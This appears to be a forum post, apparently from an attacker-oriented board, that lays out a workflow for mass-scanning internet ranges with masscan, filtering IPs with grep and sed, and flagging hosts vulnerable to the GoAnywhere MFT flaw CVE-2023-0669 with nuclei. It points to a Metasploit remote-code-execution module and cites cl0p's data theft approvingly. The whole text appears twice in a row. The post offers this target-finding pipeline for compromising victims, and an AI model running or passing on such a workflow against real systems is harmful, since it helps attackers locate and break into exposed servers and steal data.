I've been reading about cl0p group exploiting GoAnywhere (CVE-2023-0669) and having great success exfiltrating data.
Scanning (ports may vary):
1. masscan -p8001,8000 -Pn -sS -iL ranges.txt -oL results --rate 10000 --excludefile block.txt
2. Filter IPs: grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" results > results_list
3. Append port to IP for vuln scan: sed -i 's/$/:8001/' results_list
4. nuclei -l results_list -t nuclei-templates/cves/2023/CVE-2023-0669.yaml
References:
[1] https://www.rapid7.com/db/modules/exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669/ (msf exploit)
[2] https://www.rapid7.com/db/vulnerabilities/goanywhere-cve-2023-0669-remote-code-injection/
[3] https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
News:
[1] https://www.malwarebytes.com/blog/n...mware-is-victimizing-goanywhere-mft-customers
[2] https://www.securityweek.com/hitach...n-zero-day-as-ransomware-gang-threatens-firm/
[3] https://www.bleepingcomputer[.]com/...-breached-130-orgs-using-goanywhere-zero-day/
Scanning (ports may vary):
1. masscan -p8001,8000 -Pn -sS -iL ranges.txt -oL results --rate 10000 --excludefile block.txt
2. Filter IPs: grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" results > results_list
3. Append port to IP for vuln scan: sed -i 's/$/:8001/' results_list
4. nuclei -l results_list -t nuclei-templates/cves/2023/CVE-2023-0669.yaml
References:
[1] https://www.rapid7.com/db/modules/exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669/ (msf exploit)
[2] https://www.rapid7.com/db/vulnerabilities/goanywhere-cve-2023-0669-remote-code-injection/
[3] https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
News:
[1] https://www.malwarebytes.com/blog/n...mware-is-victimizing-goanywhere-mft-customers
[2] https://www.securityweek.com/hitach...n-zero-day-as-ransomware-gang-threatens-firm/
[3] https://www.bleepingcomputer[.]com/...-breached-130-orgs-using-goanywhere-zero-day/
Последнее редактирование: